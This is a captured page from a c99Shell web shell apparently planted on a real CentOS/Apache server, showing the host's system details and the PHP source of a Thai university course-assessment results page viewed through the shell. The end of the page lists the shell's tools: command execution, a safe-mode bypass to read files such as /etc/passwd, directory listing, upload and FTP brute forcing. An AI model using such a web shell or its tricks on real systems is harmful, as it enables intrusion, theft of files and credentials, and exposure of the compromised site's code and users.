!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/eassess/admin/fileupdate/eassess/admin/   drwxr-xr-x
Free 50.75 GB of 127.8 GB (39.71%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     2552-05-19-1.0.01-showResultRQCourseTe.php (11.54 KB)      -rw-r--r--
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">    
    <?
    set_time_limit
(0);
    
?>
<table  border="0" align="left" cellpadding="0" cellspacing="0">
<tr><td width="650" >&nbsp;</td><td >&nbsp; </td></tr>
<tr><td width="650">
<table width="300" border="0" align="center" cellpadding="2" cellspacing="1" bgcolor="silver">
        <tr align="center" bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_7'];?>">
            <td width="10%">กลุ่ม</td>
            <td width="35%">นศ.ที่ลง<br>ทะเบียน(คน)</td>
            <td width="35%">นศ.ที่เข้า<br >ประเมิน(คน)</td>
            <td width="15%">ร้อยละ</td>
        </tr>
        <? 
            $groupSec
=0;
            
$oDo->CountDoStdOrderSectionByDefineIdCourseIdOfficerid($defineid,$courseId,$officerId);
            while(
$oDo->GetRecord()){                
        
?>
                <tr align="center" bgcolor="#FFFFFF">
            <td ><?=$oDo->section?></td>
            <td ><?=$oDo->num2?></td>
            <td ><?=$oDo->num1?></td>
            <td ><?=number_format($oDo->per,2)?></td>
            </tr>
            <? $groupSec+=1; } ?>
    </table>
    </td></tr>
                      <?      
                    $oSA 
= new SectionAll($oCA);
                    
$numSection$oSA->RSCountSectionAll($assid);
                    
$oSA->RSByKeyAss($assid);
                    
$i 1;
                    
$indexSection 1;
                    while (
$oSA->GetRecord()){
                        
/*---------------- กรณีที่เลือกเป็นคำถามชนิดปลายปิด------------------*/
                        
if($oSA->sectionRQid != '0'){    
                            
//สร้าง oSRQ แสดงหัวข้อของส่วนการประเมิน
                            
$oSRQ = new SectionRQ($oCA);
                            
$oSRQ->RSSectionRQAll($assid,$oSA->sectionRQid);
                            while(
$oSRQ->GetRecord()){
                                
$oHQ = new HeaderQuestion($oCA);
                                
$oHQ->RSHeaderAllBySection($assid,$oSA->sectionRQid);
                                
$oHQ->GetRecord();                
                                
$oHS = new HeaderScore($oCA);
                                
$oHS->RSHeadSAll($oHQ->HSid);
                                
$oHS->GetRecord();        
 
?>
                      <!---------------------------------  Tab1 คำถามปลายปิด -------------------------------------------->
                      
    <tr><td width="650">
    
    <table align="center">
                        <tr> <td>&nbsp;</td>
                        </tr>
                        <tr> 
                          <td valign="top"><font size="2"><span class = "fontMarkTD1"><? if($numSection == '1') { echo "คำอธิบาย"; } else { echo "ส่วนที่ ".$indexSection; }?></span> : </font></td>
                          <td width="518"><font size="2"><? echo $oSRQ->topicSectionRQ ;?></font></td>
                        </tr>
                      </table>
                      <br>
                               <table width="352" border="0" align="center" cellpadding="1" cellspacing="1" bordercolor="<?php echo $GLOBALS["COLOR_BORDER_TABLE_1"];?>">
                               <tr> 
                                <td width="348" height="22"> 
                                <fieldset>
                                    <legend> <font color="<?php echo $GLOBALS["COLOR_FONT_9"]; ?>" size="2">เกณฑ์ประเมินหรือพิจารณาค่าเฉลี่ย</font></legend>
                                    <br>
                                    <table width="86%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="silver">
                                          <tr bgcolor="<?php echo $GLOBALS['COLOR_BG_TD_7'];?>"> 
                                            <td width="43%" align="center"><font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>">ช่วงคะแนน</font></td>
                                            <td width="57%" align="center">
                                            <?php if($oHS->HStext == "") { ?> 
                                                     <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_3'];?>"> ** ยังไม่ได้กำหนด ** </font>
                                            <? } else{  ?>
                                                    <font size="2" color="<?php echo $GLOBALS['COLOR_FONT_4'];?>"><? echo $oHS->HStext ?></font>
                                            <? ?>
                                            </td>
                                          </tr>
                                     <? 
                                            $ch 
0;
                                            
$oDS = new DetailScore($oCA);
                                              
$oDS->RSDetailSAll($oHS->HSid);
                                              while(
$oDS->GetRecord()){
                                    
?>
                                             <tr> 
                                                  <td align="center" bgcolor="#FFFFFF"><? echo $oDS->CTFirst ?> - <? echo $oDS->CTLast ?></td>
                                                <td bgcolor="#FFFFFF" align="center"><? echo $oDS->DStext ?></td>
                                             </tr>
                                    <? 
                                            
if($ch==0)
                                                
$full_mark $oDS->CTLast;
                                            
$ch++;
                                        } 
// end oDS 
                                    
if($ch == 0){
                                    
?>
                                        <tr bgcolor="#FFFFFF">
                                            <td colspan="2" align="center"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"];?>"> ** ยังไม่ได้กำหนด ** </font></td>
                                        </tr>
                                    <? ?>
                                    </table>   <br>
                                </fieldset>
                             </td>
                            </tr>
                           </table>
                      <br>
        </td>
        <td >&nbsp; </td>
  </tr>
        <tr><td colspan="2">
                             <table  border="0" cellpadding="1" cellspacing="1" bgcolor="silver">
                            <tr height="20" bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_2"];?>"> 
                            <td  width="480" align="center" rowspan="2"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_1"];?>"><b><? echo $oHQ->HQtext ?></b></font></td>
                            <? for($i=1;$i<=$groupSec;$i++){ ?>
                            <td align="center" colspan="3"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><b>กลุ่ม<?=$i?> </b></font></td><? ?>
                           </tr>
                           <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_2"];?>"> 
                           <? for($i=1;$i<=$groupSec;$i++){ ?>
                            <td width="39" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><b>%</b></font></td>
                            <td width="39" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><b>ค่าเฉลี่ย. </b></font></td>
                            <td width="40" align="center"><font color="<?php echo $GLOBALS["COLOR_FONT_1"];?>" size="2"><b>ค่า S.D. </b></font></td><? ?>
                           </tr>
                   <?  /*--------------------------------------------------------- คำนวนส่วนของคำถามข้อหลัก -------------------------------------------------------*/
                            
$index1 1$index2 1;
                            
$index_color1 1$index_color2 1;
                            
$CntSubQ 0;  $xbar 0;  $sd 0;
                            
$oRQ = new RadioQuestion($oCA);
                            
$oRQ->RSRadioQByKey($assid,$oSA->sectionRQid,1);
                            while(
$oRQ->GetRecord()){
                                
$oCntRQ = new RadioQuestion($oCA);
                                
$CntSubQ $oCntRQ->RSCountSubRQid($assid,$oRQ->RQid,'2');

            
//            echo $oSA->sectionRQid."--".$oRQ->RQid.'<br>';

                                
if($index_color2%== 0){//EEF2FB
                                    
if($index_color1%== 0){
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                    }else{
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                    }
                                }else{
                                    if(
$index_color1%== 0){
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                    }else{
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                    }
                                }
                        
?>    <td height="22"><? echo $index1."." ?> <? echo $oRQ->nameRQ ?><? //echo "--sectionRQid-".$oSA->sectionRQid."--RQid-".$oRQ->RQid?></td> <?
                            
if($CntSubQ == 0){    
                                
//คิดค่าเฉลี่ยและค่า sd ของคำถามข้อหลัก 
                                
if($ttId==0){
                
//                    $oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQid($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$oRQ->RQid);
                                    
$oRRQ->RSXbarSDEachRQidByAcadSemDefineidOfficerIdCourseIdSectionRQid($full_mark,$acadYear,$semester,$defineid,$officerId,$courseId,$oSA->sectionRQid,$oRQ->RQid);
                                }else
                                    
$oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQidttId($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$oRQ->RQid,$ttId);
                                    
$group 1;
                                while(
$oRRQ->GetRecord()){
                                    
$xbar $oRRQ->xbar;
                                    
$sd $oRRQ->sd;
                                    
$per $oRRQ->per;
                                    
                    
?>        
                             <td align="center">
                                  <? if($xbar != 0) echo number_format($per,0);?>
                                  <? if(($CntSubQ == 0)&&($numCourseDoAss == 0)) echo "-"?>
                              </td>                   
                              <td align="center">
                                  <? if($xbar != 0) echo number_format($xbar,2);?>
                                  <? if(($CntSubQ == 0)&&($numCourseDoAss == 0)) echo "-"?>
                              </td>  
                          <td align="center"> 
                                  <? if($xbar != 0)  echo number_format($sd,2); ?>
                                  <? if(($CntSubQ == 0)&&($numCourseDoAss == 0)) echo "-"?>
                          </td>
                 <?                  $group++;
                                     }
                            }                                    
                  
?>
                            </tr>
                   <?  /*--------------------------------------------------------- คำนวนส่วนของคำถามข้อย่อย-------------------------------------------------------*/
                            
$xbarSub 0;  $sdSub 0;
                            
$ocRQ = new RadioQuestion($oCA);
                            
$ocRQ->RSCheckLevel($assid,$oRQ->RQid);
                            while(
$ocRQ->GetRecord()){

                                if(
$index_color1%== 0){//EEF2FB
                                    
if($index_color2%== 0){
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                    }else{
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                    }
                                }else{
                                    if(
$index_color2%== 0){
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_5"].'">';
                                    }else{
                                        echo 
'<tr bgcolor="'.$GLOBALS["COLOR_BG_TD_4"].'">';
                                    }
                                }
                                
                                
//คิดค่าเฉลี่ยและค่า sd ขอคำถามข้อย่อย
                                
if($ttId==0)
                            
//        $oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQid($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$ocRQ->RQid);
                                    
$oRRQ->RSXbarSDEachRQidByAcadSemDefineidOfficerIdCourseIdSectionRQid($full_mark,$acadYear,$semester,$defineid,$officerId,$courseId,$oSA->sectionRQid,$oRQ->RQid);
                                else
                                    
$oRRQ->SearchResultIXbarSDEachRQidByAcadSemDefineidOfficerIdClassIdSectionRQidttId($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$ocRQ->RQid,$ttId);

                                if(
$oRRQ->GetRecord()){
                                    
$xbarSub $oRRQ->xbar;
                                    
$sdSub $oRRQ->sd;
                                }                            
                         
?>
                                <td height="22"><? echo "<img src=\"../picture/blank1.gif\"border=\"0\">".$index1.".".$index2 ?> <? echo $ocRQ->nameRQ ?></td>
                            <td align="center"> 
                                <? if($xbarSub != 0) echo number_format($per,2); ?>
                                <? if($numCourseDoAss == '0') echo "-"?>
                            </td>
                            <td align="center"> 
                                <? if($xbarSub != 0) echo number_format($xbarSub,2); ?>
                                <? if($numCourseDoAss == '0') echo "-"?>
                            </td>
                           <td align="center"> 
                                <? if($xbarSub != 0) echo number_format($sdSub,2);?>
                                <? if($numCourseDoAss == '0') echo "-"?>
                            </td>
                        </tr>
                            <?        
                                  $index2
++;
                                  
$index_color2++;    
                              } 
//end while ocRQ    
                                
$index1++;
                                
$index2 1;
                                
$index_color1++;
                            } 
//end while oRQ

                        
if($ttId==0)
                    
//        $oRRQ->SearchResultIXbarSDByAcadSemDefineidOfficerIdClassIdSectionRQid($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid);
                            
$oRRQ->RSXbarSDByAcadSemDefineidOfficerIdCourseIdSectionRQid($full_mark,$acadYear,$semester,$defineid,$officerId,$courseId,$oSA->sectionRQid);
                        else
                            
$oRRQ->SearchResultIXbarSDByAcadSemDefineidOfficerIdClassIdSectionRQidttId($acadYear,$semester,$defineid,$officerId,$classId,$oSA->sectionRQid,$ttId);
                        
?>
                        <tr bgcolor="<?php echo $GLOBALS["COLOR_BG_TABLE_1"];?>"> 
                            <td height="22" ><div align="right"><font size="2"><b>ภาพรวม</b>&nbsp;</font></div></td>    
                    <?
                        
while($oRRQ->GetRecord()){
                            
$perTotal $oRRQ->per;
                            
$xbarTotal $oRRQ->xbar;
                            
$sdTotal $oRRQ->sd;
                        
?>
                            <td align="center"><b><? echo number_format($perTotal,2); ?></b></td>
                            <td align="center"><b><? echo number_format($xbarTotal,2); ?></b></td>
                            <td align="center"><b><? echo number_format($sdTotal,2); ?></b></td>
                        <? ?>
                        </tr>
                      </table>
     <? 
                    
//end while oSRQ
                 
// end if oSA
                        
$indexSection++;
               } 
//end while oSA 
    
?>
        </td></tr>
</table>
    <?
    set_time_limit
(30);
    
?>


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0133 ]--